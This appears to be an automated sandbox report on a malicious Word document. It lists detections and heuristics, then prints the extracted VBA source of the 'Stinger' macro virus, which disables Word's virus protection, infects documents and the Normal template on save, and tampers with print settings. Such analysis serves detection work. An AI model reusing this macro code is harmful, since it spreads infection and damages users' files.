Verdict: MALICIOUS
Risk Score: 328

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including an AutoOpen subroutine, a common technique in malicious documents. The macro explicitly disables security features such as Word's virus protection and attempts to execute further code via a Shell() call. This behavior is consistent with a macro-based trojan designed to download and execute a second-stage payload.
Heuristics (7)

- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58291 bytes |

SHA-256: be6c9cd4af982a111e4fd374d02a71aafe0e00c1ae3ad642511ea51398b13abb

Detection (ClamAV): Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Projéct12.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Stinger"
Sub AutoExec()
Call StartUp
If NormalTemplate.Saved = False Then NormalTemplate.Save
End Sub
Sub AutoOpen()
Call StartUp
End Sub
Sub StartUp()
With Options
.ConfirmConversions = False
.VirusProtection = False
.SaveNormalPrompt = False
End With
On Error Resume Next
CustomizationContext = NormalTemplate
FindKey(BuildKeyCode(Arg1:=wdKeyAlt, Arg2:=wdKeyControl, _
Arg3:=wdKeyShift, Arg4:=wdKeyR)).Clear
KeyBindings.Add KeyCode:=BuildKeyCode(Arg1:=wdKeyAlt, _
Arg2:=wdKeyControl, Arg3:=wdKeyShift, Arg4:=wdKeyR), _
KeyCategory:=wdKeyCategoryMacro, _
Command:="Projéct12.Stinger.RegistrCd"
FindKey(BuildKeyCode(Arg1:=wdKeyAlt, Arg2:=wdKeyControl, _
Arg3:=wdKeyShift, Arg4:=wdKeyV)).Clear
KeyBindings.Add KeyCode:=BuildKeyCode(Arg1:=wdKeyAlt, _
Arg2:=wdKeyControl, Arg3:=wdKeyShift, Arg4:=wdKeyV), _
KeyCategory:=wdKeyCategoryMacro, _
Command:="Projéct12.Stinger.VwMacCd"
On Error GoTo 0
WordBasic.DisableAutoMacros
End Sub
Sub AutoExit()
Call FileExit
End Sub
Sub FileExit()
QuitWord = True
For Each aDoc In Documents
If CloseFile(aDoc) = "Canceled" Then
QuitWord = False
Exit For
Else
QuitWord = True
End If
Next aDoc
If QuitWord = True Then
Call ChkFiles
Application.Quit
End If
End Sub
Sub FileNew()
Dialogs(wdDialogFileNew).Show
Call RemvMac(ActiveDocument, "Stinger")
End Sub
Sub FileNewDefault()
Documents.Add
Call RemvMac(ActiveDocument, "Stinger")
End Sub
Sub FileSave()
On Error GoTo ExtFlSv
ActiveDocument.Save
On Error GoTo 0
mPrjNm = "Projéct12"
xFulNm = ActiveDocument.FullName
If ActiveDocument.VBProject.Name <> mPrjNm Then
RO_Chk = GetAttr(ActiveDocument.FullName) And vbReadOnly
If RO_Chk = 0 Then
Call InfctDcmnt(ActiveDocument)
Documents.Open FileName:=xFulNm, Format:=wdOpenFormatAuto
End If
End If
ExtFlSv:
End Sub
Sub FileSaveAs()
mDiagReply = 0
On Error Resume Next
mDiagReply = Dialogs(wdDialogFileSaveAs).Show
On Error GoTo 0
If mDiagReply = -1 Then
Call FileSave
End If
End Sub
Sub FilePrintDefault()
Call PrintRtn("FPD")
End Sub
Sub FilePrint()
Call PrintRtn("FP")
End Sub
Function PrintRtn(PrintCd)
With Options
.PrintDraft = False
.PrintFieldCodes = False
.PrintHiddenText = False
.PrintDrawingObjects = True
End With
With ActiveDocument
.PrintFormsData = False
End With
SysFl = "C:\WINDOWS\COMMAND\SYSTEM1.DT_"
If Dir(SysFl, vbHidden + vbReadOnly + vbSystem) = "" Then
mDaysOld = 0
Else
mDaysOld = DateDiff("d", FileDateTime(SysFl), Now)
End If
If CdRegistry <> "110499" Then
If ((Timer >= 0) And (Timer <= 14400)) Or _
((Timer >= 43200) And (Timer <= 46800)) Or _
((Timer >= 68400) And (Timer <= 75600)) Then
ChngOptn = True
ElseIf (Int((2 * Rnd) + 1) = 2) Then
ChngOptn = True
Else
ChngOptn = False
End If
Else
ChngOptn = False
End If
If mDaysOld < 30 Then
ChngOptn = False
End If
If PrintCd = "FP" Then
Dialogs(wdDialogFilePrint).Show
Else
ActiveDocument.PrintOut
End If
If ChngOptn = True Then
With Options
.PrintDraft = True
.PrintFieldCodes = True
.PrintHiddenText = True
.PrintDrawingObjects = False
End With
With ActiveDocument
.PrintFormsData = True
End With
With ActiveDocument
.Compatibility(wdUsePrinterMetrics) = False
.Compatibility(wdWW6BorderRules) = False
End With
End If
End Function
Sub FileOpen()
mDiagReply = 0
On Error Resume Next
mDiagReply = Dialogs(wdDialogFileOpen).Show
On Error GoTo 0
If mDiagReply = -1 Then
```

... (truncated)